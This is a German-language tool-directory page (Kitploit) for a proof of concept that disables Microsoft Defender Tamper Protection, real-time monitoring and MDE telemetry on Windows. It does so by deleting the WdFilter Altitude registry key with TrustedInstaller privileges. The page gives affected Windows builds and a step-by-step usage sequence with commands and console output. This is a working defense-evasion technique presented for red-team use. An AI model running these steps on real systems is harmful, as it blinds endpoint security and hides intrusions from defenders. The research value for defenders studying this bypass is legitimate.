Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Disable-TamperProtection — Ein POC zur Deaktivierung von TamperProtection und anderen Defender-/MDE-Komponenten | Kitploit
Tools/GitHubGitHub/alteredsecurity/disable-tamperprotection
Post-ExploitationPenetrationstestsRed TeamingAdversarial-Angriff
GitHubalteredsecurity/disable-tamperprotection

Disable-TamperProtection

Ein POC zur Deaktivierung von TamperProtection und anderen Defender-/MDE-Komponenten

Repository anzeigen
258403vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Deaktivieren von Tamper Protection und anderen Defender-/MDE-Komponenten

Es ist möglich, SYSTEM-/TrustedInstaller-Privilegien zu missbrauchen, um WdFilter-Einstellungen (ALTITUDE-Registrierungsschlüssel) zu manipulieren oder zu löschen und den Kernel-Minidriver zu entladen, um den Tamper-Schutz und andere Defender-Komponenten zu deaktivieren. Dies betrifft auch Microsoft Defender for Endpoint (MDE) und blendet MDE hinsichtlich Telemetrie und Aktivitäten auf einem Zielsystem aus.

Bei Tests wurde festgestellt, dass diese Schwachstelle die folgenden Windows-Versionen betrifft:

  • Windows Server 2022 bis BuildLabEx-Version: 20348.1.amd64fre.fe_release.210507-1500 (April-2024-Update)
  • Windows Server 2019
  • Windows 10 bis BuildLabEx-Version: 19041.1.amd64fre.vb_release.191206-1406 (April-2024-Update)
  • Windows 11 bis BuildLabEx-Version: 22621.1.amd64fre.ni_release.220506-1250 (September-2023-Update)

Blog, der den Bypass und den POC erklärt: https://www.alteredsecurity.com/post/disabling-tamper-protection-and-other-defender-mde-components

Verwendung

HINWEIS: VC_redist.x64.exe (MSVC-Laufzeit) muss möglicherweise auf dem Zielsystem installiert sein.

POC-Demo: https://youtu.be/MI6aVDHRix8

Der POC funktioniert in 3 Schritten (Administratorrechte erforderlich):

root@kitploit:~
C:\> .\Disable-TamperProtection.exe
Sequential Usage: 1 --> 2 --> 3
1:      Unload WdFilter
2:      Disable Tamper Protection
3:      Disable AV/MDE
4:      Restore AV/MDE settings

Ein Beispiel für die Verwendung des POC ist folgendes:

  1. WdFilter entladen:
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key Value: 328010
[+] Trusted Installer handle: 0000000000000120
[!] Spawning registry with TrustedInstaller privileges to delete WdFilter "Altitude" regkey.
[+] Created process ID: 3744 and assigned additional token privileges.
[+] Execute option 1 to validate!

# Upon 2nd execution if the above output repeats the target isn't vulnerable
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Enumerating WdFilter information:
        Next:   0 | Frame ID:   0 | No. of Instances:   4 | Name:        wdfilter | Altitude:          328010
[+] Restart the system or wait a few minutes for WdFilter to unload.
[+] Execute option 1 to validate!

# Restart to crash and unload WdFilter
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] WDFilter has been successfully unloaded, use option 2 to disable Tamper Protection.
  1. Tamper Protection deaktivieren:
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 2
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Trusted Installer handle: 00000000000000C4
[!] Spawning registry with TrustedInstaller privileges to alter Defender "TamperProtection" regkey from 5 to 4.
[+] Created process ID: 7748 and assigned additional token privileges.
[+] Use option '3' to finally Disable AV/MDE.
  1. Defender-/MDE-Komponenten deaktivieren:
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 3
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Trusted Installer handle: 000000000000011C
[!] Spawning registry with TrustedInstaller privileges to Disable 'RealtimeMonitoring' regkey.
[+] To disable other components of defender check source.
[+] Created process ID: 8040 and assigned additional token privileges.
  1. Den WdFilter-Minidriver, TamperProtection und die Defender-Einstellungen (Echtzeit) wiederherstellen. Stellen Sie sicher, dass Sie die Altitude-Nummer (Standard: 328010) in Zeile 530 des POC wieder auf ihren ursprünglichen Wert ändern.
root@kitploit:~
# Restart the computer after execution to restore settings successfully
C:\> .\Disable-TamperProtection.exe 4
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Make sure to change Altitude in Source (Default: 328010) and reboot computer after execution.
[+] Trusted Installer handle: 0000000000000120
[!] Spawning registry with TrustedInstaller privileges to Enable 'RealtimeMonitoring' regkey.
[+] Created process ID: 5852 and assigned additional token privileges.
[!] Spawning registry with TrustedInstaller privileges to Enable 'TamperProtection' regkey.
[+] Created process ID: 2744 and assigned additional token privileges.
[!] Spawning registry with TrustedInstaller privileges to restore WdFilter "Altitude" regkey.
[+] Created process ID: 7044 and assigned additional token privileges.

Referenzen

  • Ladereihenfolgegruppen und Altitudes für Minifilter-Treiber von Microsoft
  • NSudo
  • superUser
  • Forschungspapier zum Blenden von Defender
  • MDE-Interna von FalconForce

Danksagungen

Gepostet von: Munaf Shariff (@m3rcer)

Sicherheitsforscher bei Altered Security

Tool herunterladen